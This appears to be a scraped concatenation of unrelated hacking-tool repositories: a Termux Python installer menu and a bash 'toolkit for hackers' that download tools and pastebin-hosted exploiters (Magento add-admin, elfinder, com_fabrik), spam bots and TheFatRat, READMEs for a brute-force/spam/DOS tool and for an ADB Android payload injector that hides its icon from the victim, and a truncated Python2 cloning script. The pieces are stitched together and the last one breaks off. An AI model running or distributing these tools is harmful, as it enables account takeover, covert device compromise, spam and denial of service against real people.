/data/data/com.termux/files/home && cd weeman") os.system("cd /data/data/com.termux/files/home && chmod +x weeman.py") os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/maldevel/IPGeoLocation.git") os.system("cd /data/data/com.termux/files/home && cd IPGeoLocation") os.system("cd /data/data/com.termux/files/home && pip install -r requirements.txt") os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/Mebus/cupp.git") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python") os.system("pkg install -y nano") os.system("pip install requests") os.system("pip install beautifulsoup4") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/avramit/instahack.git") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python") os.system("pip install mechanicalsoup") os.system("pkg install -y nano") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/abdallahelsokary/TwitterSniper.git") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/blackvkng/viSQL.git") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/UltimateHackers/Hash-Buster.git") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/shawarkhanethicalhacker/D-TECT.git") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/reverse-shell/routersploit.git") os.system("cd /data/data/com.termux/files/home && cd routersploit") os.system("pip2 install -r requirements.txt") os.system("pip2 install -r requirements-dev.txt") os.system("pip2 install -r requests") os.system("clear") print("========================================") print("[+] everything successfully installed :)") print("[+] Happy Hacking <3") print("========================================") else: rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break if what == "1": os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y nmap") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] nmap installed successfully :)") print("[+] Type 'nmap' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "2": os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y hydra") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] hydra installed successfully :)") print("[+] Type 'hydra' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "3": os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/sqlmapproject/sqlmap.git") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] SQLMap installed successfully :)") print("[+] Go to sqlmap folder and type 'python2 sqlmap.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "4": os.system("pkg install -y wget") os.system("cd /data/data/com.termux/files/home && wget https://Auxilus.github.io/metasploit.sh") os.system("cd /data/data/com.termux/files/home && bash metasploit.sh") os.system("cd /data/data/com.termux/files/home && cd metasploit-framework") os.system("cd /data/data/com.termux/files/home && gem install bundle --pre") os.system("cd /data/data/com.termux/files/home && bundle config build.nokogiri --use-system-libraries") os.system("cd /data/data/com.termux/files/home && bundle install") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] Metasploit installed successfully :)") print("[+] Type 'msfconsole' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "5": os.system("pkg update -y") os.system("pkg install -y git") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/themastersunil/ngrok.git") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] ngrok installed successfully :)") print("[+] Go to ngrok folder and type './ngrok http 80' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "6": os.system("pkg update -y") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/Hax4us/Nethunter-In-Termux.git") os.system("cd /data/data/com.termux/files/home && cd Nethunter-In-Termux && chmod +x kalinethunter") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] Nethunter installed successfully :)") print("[+] Go to Nethunter-In-Termux folder and type './kalinethunter' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "7": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/ihebski/angryFuzzer.git") os.system("cd /data/data/com.termux/files/home && cd angryFuzzer") os.system("cd /data/data/com.termux/files/home && pip2 install -r requirements.txt") os.system("cd /data/data/com.termux/files/home && pip2 install requests") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] angryFuzzer installed successfully :)") print("[+] Go to angryFuzzer folder and type 'python2 angryFuzzer.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "8": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y php") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/Tuhinshubhra/RED_HAWK") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] RED_HAWK installed successfully :)") print("[+] Go to RED_HAWK folder and type 'php rhawk.php' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "9": os.system("pkg update -y") os.system("pkg install -y python2") os.system("pkg install -y git") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/evait-security/weeman.git") os.system("cd /data/data/com.termux/files/home && cd weeman") os.system("cd /data/data/com.termux/files/home && chmod +x weeman.py") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] weeman installed successfully :)") print("[+] Go to weeman folder and type 'python2 weeman.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "10": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/maldevel/IPGeoLocation.git") os.system("cd /data/data/com.termux/files/home && cd IPGeoLocation") os.system("cd /data/data/com.termux/files/home && pip install -r requirements.txt") os.system("cd /data/data/com.termux/files/home") print("====================================") print("[+] IPGeoLocation installed successfully :)") print("[+] Go to IPGeoLocation folder and type 'python ipgeolocation.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "11": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/Mebus/cupp.git") print("====================================") print("[+] Cupp installed successfully :)") print("[+] Go to cupp folder and type 'python cupp3.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "12": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python") os.system("pkg install -y nano") os.system("pip install requests") os.system("pip install beautifulsoup4") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/avramit/instahack.git") print("====================================") print("[+] Instahack installed successfully :)") print("[+] Go to instahack folder and type 'python hackinsta.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "13": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python") os.system("pip install mechanicalsoup") os.system("pkg install -y nano") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/abdallahelsokary/TwitterSniper.git") print("====================================") print("[+] TwitterSniper installed successfully :)") print("[+] Go to TwitterSniper folder and type 'python TwitterSniper.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "14": os.system("pkg update -y") os.system("pkg install -y git") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/Neo-Oli/termux-ubuntu.git") os.system("cd /data/data/com.termux/files/home && cd termux-ubuntu && bash ubuntu.sh") print("====================================") print("[+] Ubuntu installed successfully :)") print("[+] Go to termux-ubuntu folder and type './start.sh' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "15": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y wget") os.system("apt update && apt install wget -y && /data/data/com.termux/files/usr/bin/wget https://raw.githubusercontent.com/nmilosev/termux-fedora/master/termux-fedora.sh") print("====================================") print("[+] Fedora installed successfully :)") print("[+] Type 'sh termux-fedora.sh f26_arm64' or 'sh termux-fedora.sh f26_arm' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "16": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/blackvkng/viSQL.git") print("====================================") print("[+] viSQL installed successfully :)") print("[+] Go to viSQL folder and type 'python2 viSQL.py --help' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "17": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/UltimateHackers/Hash-Buster.git") print("====================================") print("[+] Hash-Buster installed successfully :)") print("[+] Go to Hash-Buster folder and type 'python2 hash.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "18": os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/shawarkhanethicalhacker/D-TECT.git") print("====================================") print("[+] Hash-Buster installed successfully :)") print("[+] Go to Hash-Buster folder and type 'python2 hash.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/reverse-shell/routersploit.git") os.system("cd /data/data/com.termux/files/home && cd routersploit") os.system("pip2 install -r requirements.txt") os.system("pip2 install -r requirements-dev.txt") os.system("pip2 install -r requests") print("====================================") print("[+] routersploit installed successfully :)") print("[+] Go to routersploit folder and type 'python2 rsf.py' to start.") print("====================================") rmenu = input("[?] Back to Menu? (y/n): ") if rmenu == "y": menu() else: break elif what == "99": print("Bye.") break
satriobintang1bersaudara
#!/bin/bash # Auto Install Tools v.2.1 # recoded By Satrio Kusbiyantoro # gausah ganti copyright kalo mau di hargai :) # Bersihkan Layar clear blue='\e[0;34' cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' ################################################### # CTRL C ################################################### trap ctrl_c INT ctrl_c() { clear echo -e $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... " sleep 1 echo "" echo -e $green"[#]> SMKN 1 Kertosono ... " sleep 1 echo "" echo -e $white"[#]> Satrio Kusbiyantoro Wuzz Here ... " read enter exit } echo -e $red" ___ ___ _______ ____ ____ " echo -e $red" / / \ | | | | | | echo -e $white" /__ /_____\ | | __| | | |" echo -e $white" / /_______\ | | \ | | |" echo -e $red" ___/ / \ | | \ | |____|" echo -e $red" ***********************************************" echo -e $white" # $red toolkit for hackers v2.1 $white #" echo -e $red" # $red happy fun guys $red #" echo -e $white" # $red contact: erik_susanto30@yahoo.com $white #" echo -e $red" # $white greetz :Kesendirian Nak SMKN 1 Kertosono $red#" echo -e $white" # $white copyright : Satrio Kusbiyantoro $white #" echo -e $red" # $white thanks to : SMKN 1 Kertosono $red #" echo -e $white" ***********************************************" echo "" echo -e $green" 01) Red Hawk" echo -e $green" 02) D-Tect" echo -e $green" 03) Hunner" echo -e $green" 04) WPScan" echo -e $green" 05) Webdav" echo -e $green" 06) Metasploit" echo -e $green" 07) Kali Nethunter" echo -e $green" 08) Ubuntu" echo -e $green" 09) viSQL " echo -e $green" 10) Ngrok" echo -e $green" 11) Torshammer " echo -e $green" 12) RouterSploit " echo -e $green" 13) Hydra " echo -e $green" 14) Weevely " echo -e $green" 15) SQLMap " echo -e $green" 16) Dirbuster " echo -e $green" 17) admin finder " echo -e $green" 18) lokomedia exploiter " echo -e $green" 19) elfinder exploiter " echo -e $green" 20) magento add admin exploiter " echo -e $green" 21) scanner tools " echo -e $green" 22) katoolin " echo -e $green" 23) arch linux " echo -e $green" 24) linux fedora" echo -e $green" 25) hash-buster" echo -e $green" 26) aircrack-ng" echo -e $green" 27) joomscan" echo -e $green" 28) mailer sender cli" echo -e $green" 29) Wordpress Brute Force" echo -e $green" 30) Oh-myzsh theme for termux" echo -e $green" 31) instabot (instagram bot)" echo -e $green" 32) fsociety" echo -e $green" 33) Cms Scanner" echo -e $green" 34) Information Gathering" echo -e $green" 35) com_fabrik exploiter" echo -e $green" 36) com foxcontact exploiter" echo -e $green" 37) installing ezsploit" echo -e $green" 38) installing spammer grab" echo -e $green" 39) installing spammer toko pedia" echo -e $green" 40) TheFatRat" echo -e $green" 41) exit" echo -e $green" 40) exit" echo -e $white"" read -p "[Satrio Kusbiyantoro]> " bct; if [ $bct = 01 ] || [ $bct = 01 ] then clear echo -e $green" Installing Red Hawk " sleep 1 apt update && apt upgrade apt install php apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e $green" Done Install Cuk " fi if [ $bct = 02 ] || [ $bct = 02 ] then clear echo -e $green" Installing D-Tect " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python git clone https://github.com/shawarkhanethicalhacker/D-TECT echo -e $red" Done Install ^_^ " fi if [ $bct = 03 ] || [ $bct = 03 ] then clear echo -e $green" Installing Hunner " sleep 1 apt-get update && apt-get upgrade apt install python apt install git git clone https://github.com/b3-v3r/Hunner echo -e $red" Done Install ^_^ " fi if [ $bct = 04 ] || [ $bct = 04 ] then clear echo -e $green" Installing Wpscan " sleep 1 apt-get update && apt-get upgrade apt install ruby apt install curl apt install git git clone https://github.com/wpscanteam/wpscan cd ~/wpscan gem install bundle bundle config build.nokogiri --use-system-libraries bundle install ruby wpscan.rb --update cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 05 ] || [ $bct = 05 ] then clear echo -e $green" Installing Webdav " sleep 1 apt update && apt upgrade apt install python apt-get install python-pip pip2 install urllib3 chardet certifi idna requests apt install openssl curl pkg install libcurl mkdir webdav cd ~/webdav wget https://pastebin.com/raw/HnVyQPtR -O webdav.py chmod 777 webdav.py cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 06 ] || [ $bct = 06 ] then clear echo -e $green" Installing Metasploit " sleep 1 apt update && apt upgrade apt install git apt install wget wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.sh chmod 777 install.sh sh install.sh echo -e $red" Done Install ^_^ " fi if [ $bct = 07 ] || [ $bct = 07 ] then clear echo -e $green" Installing Kali Nethunter " sleep 1 apt update && apt upgrade apt install git git clone https://github.com/Hax4us/Nethunter-In-Termux.git cd ~/Nethunter-In-Termux chmod 777 kalinethunter sh kalinethunter echo -e $red" Done Install ^_^ " fi if [ $bct = 08 ] || [ $bct = 08 ] then clear echo -e $green" Installing Ubuntu " sleep 1 apt update && apt upgrade apt install git apt install wget apt install proot git clone https://github.com/Neo-Oli/termux-ubuntu.git cd ~/termux-ubuntu chmod +x ubuntu.sh sh ubuntu.sh echo " Fix network please wait " sleep 1 echo "nameserver 8.8.8.8" > /data/data/com.termux/files/home/termux-ubuntu/ubuntu-fs/etc/resolv.conf echo -e $red" Done Install ^_^ " fi if [ $bct = 09 ] || [ $bct = 09 ] then clear echo -e $green" Installing viSQL " sleep 1 apt update && apt upgrade pkg install git pkg install python git clone https://github.com/blackvkng/viSQL.git cd ~/viSQL chmod 777 viSQL.py cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 10 ] || [ $bct = 10 ] then clear echo -e $green" Installing Ngrok " sleep 1 apt install wget mkdir ngrok cd ~/ngrok wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip unzip ngrok-stable-linux-arm.zip cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 11 ] || [ $bct = 11 ] then clear echo -e $green" Installing Hammer " sleep 1 pkg update pkg upgrade pkg install python pkg install git git clone https://github.com/cyweb/hammer cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 12 ] || [ $bct = 12 ] then clear echo -e $green" Installing Routersploit " sleep 1 apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 13 ] || [ $bct = 13 ] then clear echo -e $green" Installing Hydra " sleep 1 apt update && apt install -y wget apt install hydra wget http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 14 ] || [ $bct = 14 ] then clear echo -e $green" Installing Weevely " sleep 1 pkg update pkg upgrade git clone https://github.com/glides/Weevely cd ~/ echo -e $red" Done Install ^_^ " fi if [ $b ct = 15 ] || [ $bct = 15 ] then clear echo -e $green" Installing SQLMap " sleep 1 apt update && apt upgrade apt install python2 git clone https://github.com/sqlmapproject/sqlmap.git cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 16 ] || [ $bct = 16 ] then clear echo -e $green" Installing Dirbuster " sleep 1 apt-get update apt-get install python apt-get install git git clone https://github.com/maurosoria/dirsearch.git cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 17 ] || [ $bct = 17 ] then clear echo -e $green" Installing admin finder " sleep 1 apt update && apt upgrade apt-get install php mkdir adfin cd ~/webdav wget https://pastebin.com/raw/32txZ6Qr -O adfin.php cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 18 ] || [ $bct = 18 ] then clear echo -e $green" installing lokomedia exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir lokomed cd ~/lokomed wget https://pastebin.com/raw/sPpJRjCZ -O lokomedia.php cd ~/ echo -e $red" Done Install ^_^ " echo -e $red" usage : php lokomedia.php a.txt " fi if [ $bct = 19 ] || [ $bct = 19 ] then clear echo -e $green" installing elfinder exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir elfinder cd ~/elfinder wget https://pastebin.com/raw/S7Y2V19h -O elfinder.php cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 20 ] || [ $bct = 20 ] then clear echo -e $green" installing magento add admin exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir magento cd ~/magento wget https://pastebin.com/raw/PXkG73pG -O magento.php cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 21 ] || [ $bct = 21 ] then clear echo -e $green" installing scanner tools " sleep 1 apt update && apt upgrade apt install python mkdir scanner cd ~/scanner wget https://pastebin.com/raw/m79t1Zia -O scanner.py wget https://pastebin.com/raw/mgKxMWXh -O admins.1337 wget https://pastebin.com/raw/EafKj98D -O files.1337 cd ~/ echo -e $red" Done Install ^_^ " echo -e $red" usage : python2 scanner.py site.com -m files " fi if [ $bct = 22 ] || [ $bct = 22 ] then clear echo -e $green" installing katoolin " sleep 1 apt update && apt upgrade pkg install git pkg install python pkg install gnupg pkg install nano git clone https://github.com/LionSec/katoolin.git cd ~/katoolin echo -e $green"note : nano katoolin.py ganti semua kode /etc/apt/source.list dengan /data/data/com.termux/files/usr/etc/apt/sources.list kemudian simpan dengan menekan ctrl O enter kemudian ctrl X . jika tidak ada menu ctrl pada keyboard munculkan dengan menahan tombol volume atas kemudian ketik Q pada keyboard maka menu ctrl akan muncul di atas keyboard python2 katoolin.py Sisanya bisa mengikuti cara install di atas, Jika menemui masalah gpg error saat melakukan add repository install gnupg-curl dengan perintah pkg install gnupg-curl Untuk yg menggunakan termux dengan cpu arm64 (aarch64) tidak bisa menambahkan repositori kali linux karna kali linux tidak support aarch64, jadi sebelum menginstall tools kali di termux wajib dengan android dengan arm32 jika arm64 gunakan gnuroot" echo -e $red" Done Install ^_^ " fi if [ $bct = 23 ] || [ $bct = 23 ] then clear echo -e $green" installing arch linux " sleep 1 apt update && apt upgrade apt-get install git cd ~/ git clone https://github.com/sdrausty/termux-archlinux.git cd termux-archlinux chmod +x setupTermuxArch.sh ./setupTermuxArch.sh echo -e $red" Done Install ^_^ " fi if [ $bct = 24 ] || [ $bct = 24 ] then clear echo -e $green" installing fedora " sleep 1 apt update && apt upgrade apt-get install git apt install wget git clone https://github.com/nmilosev/termux-fedora.git cd termux-fedora chmod +x termux-fedora.sh echo -e $red" Done Install ^_^ " fi if [ $bct = 25 ] || [ $bct = 25 ] then clear echo -e $green" installing hash-Buster " sleep 1 apt update && apt upgrade apt install python2 && apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster echo -e $red" Done Install ^_^ " fi if [ $bct = 26 ] || [ $bct 26 ] then clear echo -e $green" installing aircrack-ng " sleep 1 apt-get update && apt-get upgrade apt-get install aircrack-ng echo -e $red" done install ^_^ " fi if [ $bct = 27 ] || [ $bct = 27 ] then clear echo -e $green" installing joomscan " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install perl git clone https://github.com/rezasp/joomscan.git echo -e $red" done install ^_^ " fi fi if [ $bct = 28 ] || [ $bct = 28 ] then clear echo -e $green" installing mailer-sender " sleep 1 apt-get update && apt-get upgrade apt-get install php5-cli curl -sS https://getcomposer.org/installer | php chmod +x composer.phar sudo mv composer.phar /usr/bin/composer git clone https://github.com/pedro-stanaka/mailer-cli.git echo -e $red" note !! " echo -e $red" usage php sendmail.php notification:mailer <email> <subject> <body>; " echo -e $red" or " echo -e $red" php sendmail.php --help " echo -e $red" done install ^_^ " fi if [ $bct = 29 ] || [ $bct = 29 ] then clear echo -e $green" installing wordpress brute force " sleep 1 apt-get update && apt-get upgrade apt-get install python apt-get install python-pip pip install request git clone https://github.com/atarantini/wpbf echo -e $red" done install ^_^ " fi if [ $bct = 30 ] || [ $bct = 30 ] then clear echo -e $green" installing termux Ohmyzsh " sleep 1 apt-get update && apt-get upgrade sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)" ~/.termux/colors.sh echo -e $red" ganti color ? ketik ~/.termux/colors.sh " echo -e $red" Done Install ^_^ " fi if [ $bct = 31 ] || [ $bct = 31 ] then clear echo -e $green" installing Instabot instagram bot " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git apt-get install nano git clone https://github.com/instabot-py/instabot.py echo -e $red" Done Install ^_^ " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd instabot.py echo -e $red" ketik nano example.py " echo -e $red" masukan username dan password mu" echo -e $red" Done Install ^_^" fi if [ $bct = 32 ] || [ $bct = 32 ] then clear echo -e $green" installing fsociety " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Manisso/fsociety echo -e $red" Done Install ^_^ " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd fsociety echo -e $red" python fsociety.py " fi if [ $bct = 33 ] || [ $bct = 33 ] then clear echo -e $green" installing CMS Scanner " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Dionach/CMSmap.git sleep 1 cd CMSmap echo -e $red" Usage: cmsmap.py -t <URL> " fi if [ $bct = 34 ] || [ $bct = 34 ] then clear echo -e $green" installing INFORMATION Gathering " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/m4ll0k/Infoga.git infoga sleep 1 cd infoga pip install -r req echo -e $red" Usage: python infoga.py " fi if [ $bct = 35 ] || [ $bct = 35 ] then clear echo -e $green" installing com fabrik exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/LDvFvtUD -O com_fabrik.php sleep 1 echo -e $red" Usage: php com_fabrik.php target.txt " fi if [ $bct = 36 ] || [ $bct = 36 ] then clear echo -e $green" installing com foxcontact exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/EAtSir5V -O com_foxcontact.php sleep 1 echo -e $red" Usage: php com_foxcontact.php target.txt " fi if [ $bct = 37 ] || [ $bct = 37 ] then clear echo -e $green" installing ezsploit " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/rand0m1ze/ezsploit sleep 1 echo -e $red" Done Install ^_^ " fi if [ $bct = 38 ] || [ $bct = 38 ] then clear echo -e $green" installing spammer grab " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python pip install requests git clone https://github.com/p4kl0nc4t/Spammer-Grab/ sleep 1 echo -e $red" Done Install ^_^ " fi if [ $bct = 39 ] || [ $bct = 39 ] then clear echo -e $green" installing spammer toko pedia " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install unzip git clone https://github.com/mrcakil/spam cd spam unzip toko-pedia.zip sleep 1 echo -e $red" Done Install ^_^ " fi if [ $bct = 40 ] || [ $bct = 40 ] then clear echo -e $green" installing TheFatRat " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh sleep 1 echo -e $red" Done Install ^_^ " fi if [ $bct = 41 ] || [ $bct = 41 ] then echo -e $green" pesan terakhir " sleep 1 echo -e $green" dear jomblo " sleep 1 echo -e $green" Jangan Hina Orang " sleep 1 echo -e $green" Please Wait.... " sleep 1 echo -e $green" contact : 082335546357 " sleep 1 echo -e $blue" fb : https://www.facebook.com/profile.php?id=100009867736195 " sleep 1 echo -e $red" SMKN 1 Kertosono :* " sleep 1 exit fi
TaroballzChen
the metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.
T0x8c
Requires Python2 (Linux) ``` apt-get install python2 ``` ``` git clone https://www.github.com/T0x8c/SRKAKASHI ``` ``` chmod +x requirements.sh ``` ``` ./requirements.sh ``` Features ====== ##### BruteForce SRKAKASHI uses Selenium to automatically input passwords into a website ##### GeoLocation Gelocation allows the user to pin point the exact location of the ip address ##### Sms Spam Uses gmail to spam sms ##### Spoof Email Sends anonymous emails ##### Check If Website Exists Mercury checks if the website is real ##### Check if Website Is Down Checks if websites status is online or offline ##### Encode Strings Into Hash Form Encodes your text into hash form ##### Hex Encode/Decode Encodes and decodes hex strings ##### Whats My Ip & Mac shows mac and ip address ##### Spam email spams email in While True loop ##### Download Extra Tools Download an extra 16 tools like hydra, metasploit and nmap ##### Github Cloner & Pip Intsaller Installs Pips and Github repos ##### Website Cloner Extracts the source code from a website ##### Ip Address From Website Finds ip address from website ##### nmap Nmap must be pre installed and its somewhat glitchy on linux ##### Port Listen Listens to ports #### DOS dos attack via packets ##### AnonWebbrowser Loads up Chrome, with a proxy ##### Google Dorks Finds vulrnable links ##### Admin Pannel Helps find the admin pannel to a website ##### Websites Access some of the best hacking & robotoics websites. ##### Proxy Scraper Find the best Us proxys! ##### Twitter Info Grab Grab a twitter users basic info
Gamingwithlogout
Its a automatic PAYLOAD injector tools for kali linux powered by LogOut AKA Ethical Hacker. ##First os all make install of all the files required during this process . you can directly do it by installation script i.e. install.sh on the main folder. Run ./install.sh OR install the following packages 1. metasploit-framework 2. Android Debug Bridge(ADB) 3. Fastboot 4. colorama for python 5. Python3 Be sure to setup or place the HacksByLogout folder on root directory of system and not to touch or edit any files or it may cause you to stop working. Steps You need to follow!!!! (1) Just enter your IP of device. Note: you can check your ip using ifconfig command in terminal. (2) Enter the port : Note: I usually recommend using 8080, 4444, 5555 or any 4 digit number as a port since it is very necessary, you need to use the port . (3) turn on usb debugging on your device and plug it for 10 seconds. Time depend upon your internet connection and system power. (4) After the injection , it will automatic open msf console so that it will be easy for you. (5) type the commands given to you on opened terminal. After exploit just tap or launch the installed PAYLOAD for single time and you will be connected. MAKING PAYLOAD SECURE!!! after connection just type the following command and hit enter. hide_app_icon this let you to hide your PAYLOAD and make it undetectable by user. use help command to list the things you can do. Copyright@HacksByLogOut
Kelechiodinakachi
#!/usr/bin/python2 #coding=utf-8 #The Credit For This Code Goes To lovehacker #If You Wanna Take Credits For This Code, Please Look Yourself Again... #Reserved2020 import os,sys,time,mechanize,itertools,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib from multiprocessing.pool import ThreadPool #### RANDOM Clour #### P = '\033[1;97m' # M = '\033[1;91m' # H = '\033[1;92m' # K = '\033[1;93m' # B = '\033[1;94m' # U = '\033[1;95m' # O = '\033[1;96m' # my_color = [P, M, H, K, B, U, O] warna = random.choice(my_color) warni = random.choice(my_color) def pkgs(): love("\033[1;91m«-----------------\033[1;96mSHABIR BALOCH\033[1;91m-----------------»") love("\033[1;96m«-----------------Disclaimer---------------»") love("\033[1;91m This Tool is for Educational Purpose") love("\033[1;93mThis presentation is for educational") love("\033[1;93mpurposes ONLY.How you use this information") love("\033[1;93mis your responsibility.I will not be") love("\033[1;93mheld accountable This Tool/Channel Doesn't") love("\033[1;93mSupport illegal activities.for any illegal") love("\033[1;93mActivitie This Tool is for Educational Purpose") love("\033[1;91m«------------------SHABIR BALOCH----------------»") love("\033[1;95mB4Baloch 2nd Tool Start ComingSoon New Update»") love("\033[1;96m «-----------------\033[1;92mSHABIR BALOCH\033[1;96m--------------»") time.sleep(0.3) os.system("pip install lolcat") try: import mechanize except ImportError: os.system("pip2 install mechanize") try: import requests except ImportError: os.system("pip2 install requests") os.system("python2 Cloning.py") from requests.exceptions import ConnectionError from mechanize import Browser from datetime import datetime reload(sys) 